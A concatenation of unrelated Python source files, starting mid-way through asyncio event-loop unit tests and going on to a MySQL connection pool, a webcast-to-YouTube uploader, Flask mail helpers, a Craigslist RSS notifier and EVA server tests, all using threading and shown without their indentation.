socket.SOL_SOCKET, socket.SO_REUSEPORT))
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST))
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@patch_socket
def test_create_datagram_endpoint_nosoreuseport(self, m_socket):
del m_socket.SO_REUSEPORT
m_socket.socket.return_value = mock.Mock()
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_ip_addr(self, m_socket):
def getaddrinfo(*args, **kw):
self.fail('should not have called getaddrinfo')
m_socket.getaddrinfo = getaddrinfo
m_socket.socket.return_value.bind = bind = mock.Mock()
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
reuseport_supported = hasattr(socket, 'SO_REUSEPORT')
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
local_addr=('1.2.3.4', 0),
reuse_port=reuseport_supported)
t, p = self.loop.run_until_complete(coro)
try:
bind.assert_called_with(('1.2.3.4', 0))
m_socket.socket.assert_called_with(family=m_socket.AF_INET,
proto=m_socket.IPPROTO_UDP,
type=m_socket.SOCK_DGRAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
def test_accept_connection_retry(self):
sock = mock.Mock()
sock.accept.side_effect = BlockingIOError()
self.loop._accept_connection(MyProto, sock)
self.assertFalse(sock.close.called)
@mock.patch('asyncio.base_events.logger')
def test_accept_connection_exception(self, m_log):
sock = mock.Mock()
sock.fileno.return_value = 10
sock.accept.side_effect = OSError(errno.EMFILE, 'Too many open files')
self.loop._remove_reader = mock.Mock()
self.loop.call_later = mock.Mock()
self.loop._accept_connection(MyProto, sock)
self.assertTrue(m_log.error.called)
self.assertFalse(sock.close.called)
self.loop._remove_reader.assert_called_with(10)
self.loop.call_later.assert_called_with(
constants.ACCEPT_RETRY_DELAY,
# self.loop._start_serving
mock.ANY,
MyProto, sock, None, None, mock.ANY, mock.ANY)
def test_call_coroutine(self):
async def simple_coroutine():
pass
self.loop.set_debug(True)
coro_func = simple_coroutine
coro_obj = coro_func()
self.addCleanup(coro_obj.close)
for func in (coro_func, coro_obj):
with self.assertRaises(TypeError):
self.loop.call_soon(func)
with self.assertRaises(TypeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(TypeError):
self.loop.call_later(60, func)
with self.assertRaises(TypeError):
self.loop.call_at(self.loop.time() + 60, func)
with self.assertRaises(TypeError):
self.loop.run_until_complete(
self.loop.run_in_executor(None, func))
@mock.patch('asyncio.base_events.logger')
def test_log_slow_callbacks(self, m_logger):
def stop_loop_cb(loop):
loop.stop()
async def stop_loop_coro(loop):
loop.stop()
asyncio.set_event_loop(self.loop)
self.loop.set_debug(True)
self.loop.slow_callback_duration = 0.0
# slow callback
self.loop.call_soon(stop_loop_cb, self.loop)
self.loop.run_forever()
fmt, *args = m_logger.warning.call_args[0]
self.assertRegex(fmt % tuple(args),
"^Executing <Handle.*stop_loop_cb.*> "
"took .* seconds$")
# slow task
asyncio.ensure_future(stop_loop_coro(self.loop), loop=self.loop)
self.loop.run_forever()
fmt, *args = m_logger.warning.call_args[0]
self.assertRegex(fmt % tuple(args),
"^Executing <Task.*stop_loop_coro.*> "
"took .* seconds$")
class RunningLoopTests(unittest.TestCase):
def test_running_loop_within_a_loop(self):
async def runner(loop):
loop.run_forever()
loop = asyncio.new_event_loop()
outer_loop = asyncio.new_event_loop()
try:
with self.assertRaisesRegex(RuntimeError,
'while another loop is running'):
outer_loop.run_until_complete(runner(loop))
finally:
loop.close()
outer_loop.close()
class BaseLoopSockSendfileTests(test_utils.TestCase):
DATA = b"12345abcde" * 16 * 1024 # 160 KiB
class MyProto(asyncio.Protocol):
def __init__(self, loop):
self.started = False
self.closed = False
self.data = bytearray()
self.fut = loop.create_future()
self.transport = None
def connection_made(self, transport):
self.started = True
self.transport = transport
def data_received(self, data):
self.data.extend(data)
def connection_lost(self, exc):
self.closed = True
self.fut.set_result(None)
self.transport = None
async def wait_closed(self):
await self.fut
@classmethod
def setUpClass(cls):
cls.__old_bufsize = constants.SENDFILE_FALLBACK_READBUFFER_SIZE
constants.SENDFILE_FALLBACK_READBUFFER_SIZE = 1024 * 16
with open(os_helper.TESTFN, 'wb') as fp:
fp.write(cls.DATA)
super().setUpClass()
@classmethod
def tearDownClass(cls):
constants.SENDFILE_FALLBACK_READBUFFER_SIZE = cls.__old_bufsize
os_helper.unlink(os_helper.TESTFN)
super().tearDownClass()
def setUp(self):
from asyncio.selector_events import BaseSelectorEventLoop
# BaseSelectorEventLoop() has no native implementation
self.loop = BaseSelectorEventLoop()
self.set_event_loop(self.loop)
self.file = open(os_helper.TESTFN, 'rb')
self.addCleanup(self.file.close)
super().setUp()
def make_socket(self, blocking=False):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(blocking)
self.addCleanup(sock.close)
return sock
def run_loop(self, coro):
return self.loop.run_until_complete(coro)
def prepare(self):
sock = self.make_socket()
proto = self.MyProto(self.loop)
server = self.run_loop(self.loop.create_server(
lambda: proto, socket_helper.HOST, 0, family=socket.AF_INET))
addr = server.sockets[0].getsockname()
for _ in range(10):
try:
self.run_loop(self.loop.sock_connect(sock, addr))
except OSError:
self.run_loop(asyncio.sleep(0.5))
continue
else:
break
else:
# One last try, so we get the exception
self.run_loop(self.loop.sock_connect(sock, addr))
def cleanup():
server.close()
self.run_loop(server.wait_closed())
sock.close()
if proto.transport is not None:
proto.transport.close()
self.run_loop(proto.wait_closed())
self.addCleanup(cleanup)
return sock, proto
def test__sock_sendfile_native_failure(self):
sock, proto = self.prepare()
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"sendfile is not available"):
self.run_loop(self.loop._sock_sendfile_native(sock, self.file,
0, None))
self.assertEqual(proto.data, b'')
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_no_fallback(self):
sock, proto = self.prepare()
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"sendfile is not available"):
self.run_loop(self.loop.sock_sendfile(sock, self.file,
fallback=False))
self.assertEqual(self.file.tell(), 0)
self.assertEqual(proto.data, b'')
def test_sock_sendfile_fallback(self):
sock, proto = self.prepare()
ret = self.run_loop(self.loop.sock_sendfile(sock, self.file))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(ret, len(self.DATA))
self.assertEqual(self.file.tell(), len(self.DATA))
self.assertEqual(proto.data, self.DATA)
def test_sock_sendfile_fallback_offset_and_count(self):
sock, proto = self.prepare()
ret = self.run_loop(self.loop.sock_sendfile(sock, self.file,
1000, 2000))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(ret, 2000)
self.assertEqual(self.file.tell(), 3000)
self.assertEqual(proto.data, self.DATA[1000:3000])
def test_blocking_socket(self):
self.loop.set_debug(True)
sock = self.make_socket(blocking=True)
with self.assertRaisesRegex(ValueError, "must be non-blocking"):
self.run_loop(self.loop.sock_sendfile(sock, self.file))
def test_nonbinary_file(self):
sock = self.make_socket()
with open(os_helper.TESTFN, encoding="utf-8") as f:
with self.assertRaisesRegex(ValueError, "binary mode"):
self.run_loop(self.loop.sock_sendfile(sock, f))
def test_nonstream_socket(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setblocking(False)
self.addCleanup(sock.close)
with self.assertRaisesRegex(ValueError, "only SOCK_STREAM type"):
self.run_loop(self.loop.sock_sendfile(sock, self.file))
def test_notint_count(self):
sock = self.make_socket()
with self.assertRaisesRegex(TypeError,
"count must be a positive integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 0, 'count'))
def test_negative_count(self):
sock = self.make_socket()
with self.assertRaisesRegex(ValueError,
"count must be a positive integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 0, -1))
def test_notint_offset(self):
sock = self.make_socket()
with self.assertRaisesRegex(TypeError,
"offset must be a non-negative integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 'offset'))
def test_negative_offset(self):
sock = self.make_socket()
with self.assertRaisesRegex(ValueError,
"offset must be a non-negative integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, -1))
class TestSelectorUtils(test_utils.TestCase):
def check_set_nodelay(self, sock):
opt = sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
self.assertFalse(opt)
base_events._set_nodelay(sock)
opt = sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
self.assertTrue(opt)
@unittest.skipUnless(hasattr(socket, 'TCP_NODELAY'),
'need socket.TCP_NODELAY')
def test_set_nodelay(self):
sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM,
proto=socket.IPPROTO_TCP)
with sock:
self.check_set_nodelay(sock)
sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM,
proto=socket.IPPROTO_TCP)
with sock:
sock.setblocking(False)
self.check_set_nodelay(sock)
if __name__ == '__main__':
unittest.main()
|
dbpond3.py
|
#!/usr/bin/python3
#-*-coding:utf-8-*-
import os
import sys
import traceback
import logging
import threading
import configparser
import time
import pymysql
from DBUtils.PooledDB import PooledDB
basedir = os.path.dirname(os.path.realpath(__file__))
locking = threading.Lock()
#logging.basicConfig(level=logging.DEBUG)
logging.basicConfig(level=logging.DEBUG, format='%(threadName)s>{%(levelname)s}:%(message)s')
'''每个线程一个数据库连接对象'''
#@是装饰器
class Database(object):
__dp = None
def __init__(self):
#logging.info('DatabaseIniting...')
Database.__dp = DBPond()
'''查询列表'''
def fetchall(self, query, args=None):
result = None
with Database.__dp as db:
try:
db.cursor.execute(query, args)
result = db.cursor.fetchall()
except Exception as e:
self.exception('fetchall')
return result
'''查询单条记录'''
def fetchone(self, query, args=None):
result = None
with Database.__dp as db:
try:
db.cursor.execute(query, args)
result = db.cursor.fetchone()
except Exception as e:
self.exception('fetchone')
return result
'''插入记录并返回主键ID'''
def insert(self, query, args=None):
result = None
with Database.__dp as db:
cs = db.cursor
try:
cs.execute(query, args)
db.conn.commit()
except Exception as e:
db.conn.rollback()
self.exception('insert')
result = cs.lastrowid
return result
'''标准执行'''
def execute(self, query, args=None):
result = None
with Database.__dp as db:
cs = db.cursor
try:
cs.execute(query, args)
db.conn.commit()
except Exception as e:
db.conn.rollback()
self.exception('execute')
result = cs.rowcount
return result
'''异常记录到数据库'''
def exception(self, remark):
#a,b,c = sys.exc_info()
logging.info(traceback.format_exc(limit=1))
content = traceback.format_exc()
message = str(sys.exc_info())
seetime = time.strftime('%F %T')
sql = "INSERT INTO `smnt_except` (`service`, `message`, `content`, `remark`, `seetime`) VALUES ('sqlexcept', %s, %s, %s, %s);"
with Database.__dp as db:
cs = db.cursor
#logging.debug(cs.mogrify(sql, (message, content, remark, seetime)))
try:
cs.execute(sql, args=(message, content, remark, seetime))
db.conn.commit()
except:
pass
return None
'''数据库可多线程共享的连接池'''
class DBPond():
__pool = None
def __init__(self):
locking.acquire()
if DBPond.__pool is None:
cfgdir = '{basedir}{sep}conf{sep}config.ini'.format(basedir=basedir, sep=os.sep)
dbsdir = '{basedir}{sep}conf{sep}database.ini'.format(basedir=basedir, sep=os.sep)
cp = configparser.ConfigParser()
cp.read(cfgdir, encoding='utf-8')
plate = cp.get('general', 'plate')
cp.read(dbsdir, encoding='utf-8')
link = cp.items(plate)
#[1]mincached 池最少空闲数,空间少于会创建新连接
#[5]maxcached 池最大空闲数,空闲大于会关闭多的空闲连接
#[3]maxshared 池最大共享数,连接数达到则新请求共享旧连接
#[5]maxconnections 最大连接数
#[5]maxusage 单个连接的最大复用次数
DBPond.__pool = PooledDB(pymysql,
host=link[0][1],
port=int(link[4][1]),
user=link[1][1],
passwd=link[2][1],
db=link[3][1],
mincached=1,
maxcached=5,
maxshared=3,
maxconnections=5,
blocking=True,
maxusage=5,
setsession=None,
use_unicode=False,
charset='utf8')
#logging.debug('********************CREATE:%d'%id(DBPond.__pool))
else:
#logging.debug('====USE:%d'%id(DBPond.__pool))
pass
locking.release()
def __enter__(self):
self.conn = DBPond.__pool.connection()
self.cursor = self.conn.cursor()
return self
def __exit__(self, type, value, trace):
#logging.debug('__exit__:%d'%id(self.__pool))
self.cursor.close()
self.conn.close()
#return self
db = Database()
def testdb():
#db = Database()
version = db.fetchone('SELECT VERSION();')
#logging.info(version)
excepts = db.fetchall('SELECT COUNT(*) FROM `smnt_except`;')
#logging.info(excepts)
import hashlib
for i in range(10):
officeid, realname, passbase = ['guangzhou', '张三', str(time.time())]
username = ''
password = hashlib.md5(passbase.encode('utf8')).hexdigest()
sql = "INSERT INTO `smnt_client` (`officeid`, `username`, `realname`, `password`, `passbase`) VALUES (%s, %s, %s, %s, %s)"
userid = db.insert(sql, (officeid, username, realname, password, passbase))
userkey = '%s%d'%(password[:16], userid)
result = db.execute("UPDATE `smnt_client` SET `userkey`=%s WHERE `id`=%s;", (userkey, userid))
#if result == 1:
# logging.info("新增成功:%s"%userkey)
#else:
# logging.info("新增失败:%s"%result)
version = db.execute("SELECT VERSION();")
#logging.info(version)
if __name__ == '__main__':
starttime = time.time()
tl = []
logging.info("testdb...")
for i in range(50):
i = threading.Thread(target=testdb)
tl.append(i)
i.start()
for i in tl:
i.join()
logging.info("COST:%.3f"%(time.time()-starttime))
|
2016Webcast3.py
|
#!/usr/bin/env python
import sys, os, time, urllib, urllib.request, shutil, re, lxml, threading, queue, multiprocessing
import hashlib, csv, subprocess
def get_sha256(text):
sha256 = hashlib.sha256()
sha256.update(text.encode('utf-8'))
return sha256.hexdigest()
def check_list(list, url):
# check if sha256 of url matches a sha256 in the list
# returns true if there's a match, false otherwise
if list is None:
return False
for row in list:
list_sha256 = row[0]
if list_sha256 == get_sha256(url):
return True
return False
def youtube_upload(worker_num, lock, task_queue, file, log):
# Worker thread function that will process each task in the queue
# and will block if there are no items in the queue
# Each task will download from a url and then upload to Youtube.
# Thread will not get next task until its task is done
while True:
task = task_queue.get() # task = (title, url)
if task is None:
print("%d: youtube_upload worker done" % (worker_num), flush=True)
break;
else:
print("%d: working on %s" % (worker_num, task[0]), flush=True)
# download video
title = task[0]
url = task[1]
vid_title = title + '.mp4'
try:
urllib.request.urlretrieve(url, vid_title)
except Exception as e:
print("youtube_upload error: unable to download", title, url, flush=True)
task_queue.task_done()
continue
# delete file if too small
size = os.path.getsize(vid_title)
if size <= 1000000: # delete < 1 MB file
os.remove(vid_title)
print("%d: removed (too small) %s" % (worker_num, vid_title), flush=True)
task_queue.task_done()
continue
# upload to youtube
tag_title = '--title={0:s}'.format(title)
tag_privacy = "--privacy=unlisted"
playlist = "2016_webcasts"
tag_playlist = "--playlist=" + playlist
youtube_upload = r"C:\users\jj\appdata\local\programs\python\Python35-32\Scripts\youtube-upload"
retry_count = 0
for attempt in range(20): # max 20 retry
try:
subprocess.run(['python', youtube_upload,
tag_title, tag_privacy, tag_playlist,
vid_title],
stdin=subprocess.DEVNULL, stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
except subprocess.TimeoutExpired as e:
print("%d: timeout (%d) while working on %s" %
(worker_num, attempt, vid_title), flush=True)
retry_count += 1
continue
else:
break
# delete video from local storage
if os.path.exists(vid_title):
os.remove(vid_title)
# return to start and get a new video
if retry_count >= 20:
print("%d: retry attempt MAXED out while working on %s" %
(worker_num, vid_title))
log.write("never uploaded: " + vid_title + '\n')
log.flush()
continue
# record video information
lock.acquire()
sha256 = get_sha256(url)
video_info = "{0:s}, {1:s}, {2:s}\n".format(sha256, title, url)
file.write(video_info)
file.flush()
lock.release()
print("%d: uploaded %s" % (worker_num, vid_title))
task_queue.task_done()
def main(argv):
# MATH 3 LEC fall 2016 class- 30 [version 1],http://matterhorn2-player-1.lt.ucsc.edu:8080/static/engage-player/547a1471-4c04-491b-9448-6ab3a1079aea/6b7f3ad3-37b3-47ce-912b-c7585cae6cfd/screen_primary.mp4
read_file = open('2016webcastslinks4.txt', 'r')
log_file = open('log.txt', 'w')
done_list = None
if os.path.exists('2016storage.txt'):
complete_file = open('2016storage.txt', 'r')
done_reader = csv.reader(complete_file, delimiter=',')
done_list = []
for row in done_reader:
done_list.append(row)
complete_file.close()
complete_file = open('2016storage.txt', 'a')
# start a few threads
lock = threading.Lock()
task_queue = queue.Queue()
workers = []
num_worker = 5
for i in range(num_worker):
worker = threading.Thread(target=youtube_upload, args=(i, lock, task_queue, complete_file, log_file))
worker.start()
workers.append(worker)
# read in list of videos
invalid_links = []
reader = csv.reader(read_file, delimiter=',')
for row in reader: # row = [title, url]
title = row[0]
url = row[1]
# throw away row[1] if it doesn't contain http or not .mp4 format i.e invalid element
if 'http' not in url or url.endswith('mp4') is False:
invalid_links.append((title, url))
continue
if check_list(done_list, url) is False:
task_queue.put((title, url))
else:
print("%s already uploaded" % title)
continue
task_queue.join()
for i in range(num_worker):
task_queue.put(None)
for worker in workers:
worker.join()
print("\nList of invalid links:")
for i in range(len(invalid_links)):
print(invalid_links[i][0], end=' ' )
print(invalid_links[i][1])
print("\nscript done.")
read_file.close()
complete_file.close()
log_file.close()
if __name__ == "__main__":
main(sys.argv[1:])
|
webserver.py
|
# -- Importing Packages -- #
from flask import Flask
from threading import Thread
from logging import getLogger, ERROR
# -- Disables Flask App Logging -- #
log = getLogger('werkzeug')
log.setLevel(ERROR)
# - Webserver Setup -- #
app = Flask('')
@app.route('/')
def home():
return "<h1> Hosting Active </h1><p>This bot is made by RLX and MathisCool, So make sure to credit RLX/MathisCool</p><p>Join the discord server now - https://discord.gg/SN3mZPxjEW</p>"
def run():
app.run(host='0.0.0.0', port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
rovio_video.py
|
import cv2, time
import urllib.request as urllib
import base64
import numpy as np
import threading
class ipCamera(object):
def __init__(self, url, user = None, password = None, debug=False):
self.url = url
self.auth_encoded = base64.encodestring(('%s:%s' % (user, password)).encode())[:-1]
self.debug = debug
self.curr_frame = None
self.thread = threading.Thread(target=self.stream_frame)
self.thread.setDaemon(True)
self.thread.start()
def stream_frame(self):
request = urllib.Request(self.url)
request.add_header('Authorization', 'Basic %s' % self.auth_encoded)
while True:
try:
response = urllib.urlopen(request)
img_array = np.asarray(bytearray(response.read()), dtype=np.uint8)
frame = cv2.imdecode(img_array, 1)
self.curr_frame = frame
if self.debug:
cv2.imshow('Raw frame',self.curr_frame)
cv2.waitKey(1)
except Exception as e:
print('Error')
def get_frame(self,img_width=640, img_height=480):
frame = self.curr_frame.copy() if self.curr_frame is not None else None
frame = cv2.resize(frame, (img_width, img_height))
return frame
|
email.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
# Sends asyncronous mails with threading
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['MUDAWEN_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['MUDAWEN_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
|
cl.py
|
import feedparser
from datetime import datetime
import time
import socket
from threading import Thread
import json
import os
from cl_email import CL_Email
from cl_post import CL_Post
from log import Logging
def CheckNotityInterval(notification_intervals):
for notify_time, notify_sent_flag in notification_intervals.items():
if notify_sent_flag:
if UnixTime(notify_time) <= int(time.time()):
notification_intervals[notify_time] = not notify_sent_flag
return True
return False
def NewPost(post, data_config, cl_listings):
timestamp = UnixTime(post['published'])
for stored_post in cl_listings:
if post['id'] == stored_post.id:
Log.log('Duplicate ' + post['title'])
return False
notify_pair = [(k, v) for k, v in data_config['notification_intervals'].items()]
notify_pair = sorted(notify_pair, key=lambda x: (UnixTime(x[0])))
first_notify = notify_pair[0]
last_notify = notify_pair[len(notify_pair) - 1]
for notify_time, notify_sent_flag in notify_pair:
if notify_sent_flag:
if notify_time != first_notify[0]:
prior_interval = notify_pair[notify_pair.index((notify_time, notify_sent_flag)) - 1]
if not prior_interval[1] and notify_sent_flag:
if timestamp > UnixTime(prior_interval[0]):
return True
elif notify_time == first_notify[0]:
if timestamp >= UnixTime(last_notify[0]) - 86400:
return True
elif timestamp >= UnixTime(notify_time):
return True
return False
def UnixTime(time_element):
try:
ts = datetime.strptime(''.join(time_element.rsplit(':', 1)), '%Y-%m-%dT%H:%M:%S%z')
except ValueError:
today = datetime.now().strftime('%Y-%m-%d') + 'T' + time_element
ts = datetime.strptime(''.join(today.rsplit(':', 1)), '%Y-%m-%dT%H:%M:%S%z')
return int(ts.strftime("%s"))
def ImageFilter(post, data_config):
if data_config['require_image']:
if 'enc_enclosure' not in post:
Log.log('Filtered ' + post['title'] + ' // enc_enclosure missing')
return False
if 'resource' not in post['enc_enclosure']:
Log.log('Filtered ' + post['title'] + ' // enc_enclosure/resource missing')
return False
if 'images' not in post['enc_enclosure']['resource']:
Log.log('Filtered ' + post['title'] + ' // enc_enclosure/resource/images missing')
return False
return True
def PriceFilter(post, data_config):
split_title = post['title'].rsplit(';', 1)
if len(split_title) > 1:
price = int(split_title[len(split_title) - 1])
if int(data_config['minimum_price']) > price:
Log.log('Filtered ' + post['title'] + ' // Price too low, $' + str(price))
return False
elif int(data_config['maximum_price']) < price:
Log.log('Filtered ' + post['title'] + ' // Price too high, $' + str(price))
return False
else:
post['price'] = price
return True
Log.log('Filtered ' + post['title'] + ' // no price in post')
return False
def KeywordFilter(post, data_config):
keyword_matches = []
for keyword in data_config['keywords']:
if keyword.lower() in post['title'].lower():
if keyword.lower() not in keyword_matches:
keyword_matches.append(keyword.lower())
if keyword.lower() in post['summary'].lower():
if keyword.lower() not in keyword_matches:
keyword_matches.append(keyword.lower())
if len(keyword_matches) >= int(data_config['minimum_keyword_match']) or len(keyword_matches) == len(data_config['keywords']):
post['keyword_matches'] = keyword_matches
return True
else:
Log.log('Filtered ' + post['title'] + ', insufficient keyword matches')
return False
def ParseFeed(feed, data_config, cl_listings):
new_posts = 0
for post in feed['items']:
if ImageFilter(post, data_config):
if PriceFilter(post, data_config):
if NewPost(post, data_config, cl_listings):
if KeywordFilter(post, data_config):
post['title'] = post['title'].split('&#x', 1)[0]
new_post = CL_Post(post)
cl_listings.append(new_post)
new_posts += 1
Log.log(str(new_posts) + ' new posts detected')
def PullFeeds(location, category, result, index):
feed = feedparser.parse('http://' + location +'.craigslist.org/search/' + category + '?format=rss')
result[index] = feed
def UpdateIntervals(notify_pair):
interval_dict = {}
for notify_time, notify_sent_flag in notify_pair.items():
if UnixTime(notify_time) <= time.time():
interval_dict[notify_time] = False
else:
interval_dict[notify_time] = True
return interval_dict
def LoadJson(file_path):
try:
with open(file_path, 'r') as f:
content = json.load(f)
f.close()
return content
except IOError as err:
print(err)
def WriteJson(file_path, content):
with open(file_path, 'w') as f:
if type(content) == list:
f.write(json.dumps([j.__dict__ for j in content], indent=4, sort_keys=True))
elif type(content) == str:
str_as_json = json.loads(content)
content = json.dumps(str_as_json, indent=4, sort_keys=True)
f.write(content)
elif type(content) == dict:
content = json.dumps(content, indent=4, sort_keys=True)
f.write(content)
f.close()
def IsEmpty(file_path):
if os.stat(file_path).st_size == 0:
return True
return False
def MakeEmpty(file_path):
with open(file_path, 'w') as f:
pass
f.close()
def main():
data_config_file = 'data_config.json'
email_config_file = 'email_config.json'
stored_posts_file = 'stored_posts.json'
log_file = datetime.now().strftime('%Y-%m-%dT%H:%M:%S%z') + '.log'
global Log
Log = Logging(log_file)
data_config = LoadJson(data_config_file)
email_config = LoadJson(email_config_file)
if int(data_config['logging_enabled']):
Log.start()
cl_listings = []
if not IsEmpty(stored_posts_file):
sp = LoadJson(stored_posts_file)
[cl_listings.append(CL_Post(stored_post)) for stored_post in sp]
Log.log('Imported ' + str(len(cl_listings)) + ' saved posts')
socket.setdefaulttimeout(10)
threads_required = 0
for _ in data_config['locations']:
for __ in data_config['categories']:
threads_required += 1
threads = [None] * threads_required
results = [None] * threads_required
index = 0
for location in data_config['locations']:
for category in data_config['categories']:
threads[index] = Thread(target=PullFeeds, args=(location, category, results, index))
threads[index].start()
index += 1
[threads[i].join() for i in range(threads_required)]
[ParseFeed(feed, data_config, cl_listings) for feed in results]
if len(cl_listings) > 0:
if CheckNotityInterval(data_config['notification_intervals']):
email = CL_Email(email_config)
email.write(cl_listings)
email.send()
Log.log('Email sent to ' + str(email.recipient))
if not IsEmpty(stored_posts_file):
MakeEmpty(stored_posts_file)
Log.log('Emptied contents of ' + str(stored_posts_file))
else:
Log.log('Storing posts to ' + str(stored_posts_file))
WriteJson(stored_posts_file, cl_listings)
Log.log('Successful write to ' + str(stored_posts_file))
else:
Log.log('No new posts detected')
data_config['notification_intervals'] = UpdateIntervals(data_config['notification_intervals'])
WriteJson(data_config_file, data_config)
Log.log('Updated contents of ' + str(data_config_file))
if __name__ == '__main__':
while True:
main()
time.sleep(3600)
|
mails.py
|
from urllib import parse as urlparse
from threading import Thread
from flask import render_template, current_app
from flask_mail import Message
from werkzeug.datastructures import FileStorage
from app.extensions import mail
def email_confirmation_url(token):
frontend_url = current_app.config['SCHEME']+'://'+current_app.config['FRONTEND_URL']
email_confirmation_path = current_app.config['FRONTEND_EMAIL_CONFIRM_URL']
full_url = urlparse.urljoin(frontend_url, email_confirmation_path)
url_parts = list(urlparse.urlparse(full_url))
query = dict(urlparse.parse_qsl(url_parts[4]))
query.update({
'token': token
})
url_parts[4] = urlparse.urlencode(query)
return urlparse.urlunparse(url_parts)
def password_reset_url(token):
frontend_url = current_app.config['SCHEME']+'://'+current_app.config['FRONTEND_URL']
password_reset_path = current_app.config['FRONTEND_PASSWORD_RESET_URL']
full_url = urlparse.urljoin(frontend_url, password_reset_path)
url_parts = list(urlparse.urlparse(full_url))
query = dict(urlparse.parse_qsl(url_parts[4]))
query.update({
'token': token
})
url_parts[4] = urlparse.urlencode(query)
return urlparse.urlunparse(url_parts)
def send_async_mail(app, msg):
with app.app_context():
mail.send(msg)
def send_mail(email: str, subject: str, message: str, *, sender=None, attachment: FileStorage=None):
msg = Message(
sender=sender,
subject=subject,
recipients=[email],
html=message,
)
if attachment is not None:
msg.attach(attachment.filename, attachment.content_type, attachment.stream.read())
app = current_app._get_current_object()
thr = Thread(target=send_async_mail, args=[app,msg])
thr.start()
# mail.send(msg)
def send_registration_email(email: str, fullname: str, token: str):
send_mail(
email=email,
subject='Registration on SFT',
message=render_template(
template_name_or_list='registration.html',
fullname=fullname,
token=token, secret_url=email_confirmation_url(token)
)
)
def send_password_recovery_email(email: str, fullname: str, token: str):
send_mail(
email=email,
subject='Password recovery on SFT',
message=render_template(
template_name_or_list='password_recovery.html',
fullname=fullname,
token=token, secret_url=password_reset_url(token)
)
)
def send_email_changing_email(email: str, fullname: str, token: str):
send_mail(
email=email,
subject='Email changing on SFT',
message=render_template(
template_name_or_list='email_changing.html',
fullname=fullname,
token=token, secret_url=email_confirmation_url(token)
)
)
def send_feedback(from_email: str, name: str, topic: str, message: str, attachment=None):
send_mail(
sender=from_email,
email=current_app.config['MAIL_FEEDBACK'],
subject=f'Feedback: {topic}',
message=render_template('feedback.html', fullname=name, message=message),
attachment=attachment
)
|
test_server.py
|
# coding=utf-8
# Copyright 2018-2020 EVA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import time
import threading
import mock
import asyncio
from unittest.mock import MagicMock
from eva.server.server import start_server
from eva.server.server import EvaServer
from concurrent.futures import CancelledError
class ServerTests(unittest.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
self.stop_server_future = self.loop.create_future()
asyncio.set_event_loop(None)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def test_server(self):
host = "0.0.0.0"
port = 5489
socket_timeout = 60
def timeout_server():
# need a more robust mechanism for when to cancel the future
time.sleep(2)
self.stop_server_future.cancel()
thread = threading.Thread(target=timeout_server)
thread.daemon = True
thread.start()
with self.assertRaises(CancelledError):
start_server(host=host, port=port,
loop=self.loop,
socket_timeout=socket_timeout,
stop_server_future=self.stop_server_future)
def test_server_protocol_connection_lost(self):
socket_timeout = 65
eva_server = EvaServer(socket_timeout)
eva_server.transport = mock.Mock()
eva_server.transport.close = MagicMock(return_value="closed")
eva_server.transport.abort = MagicMock(return_value="aborted")
# connection made
eva_server.connection_made(eva_server.transport)
self.assertEqual(EvaServer.__connections__, 1,
"connection not made")
# connection lost
eva_server.connection_lost(None)
self.assertEqual(EvaServer.__connections__, 0,
"connection not lost")
self.assertEqual(EvaServer.__errors__, 0,
"connection not errored out")
# connection made
eva_server.connection_made(eva_server.transport)
self.assertEqual(EvaServer.__connections__, 1,
"connection not made")
# connection lost with error
eva_server.connection_lost(mock.Mock())
self.assertEqual(EvaServer.__connections__, 0,
"connection not lost")
self.assertEqual(EvaServer.__errors__, 1,
"connection not errored out")
def test_server_protocol_data_received(self):
socket_timeout = 60
eva_server = EvaServer(socket_timeout)
eva_server.transport = mock.Mock()
eva_server.transport.close = MagicMock(return_value="closed")
eva_server.transport.abort = MagicMock(return_value="aborted")
# data received
data = mock.Mock()
data.decode = MagicMock(return_value="4|quit")
self.assertEqual(eva_server.data_received(data), "closed",
"transport not closed")
asyncio.set_event_loop(None)
with self.assertRaises(RuntimeError):
data.decode = MagicMock(return_value="5|query")
# error due to lack of asyncio loop
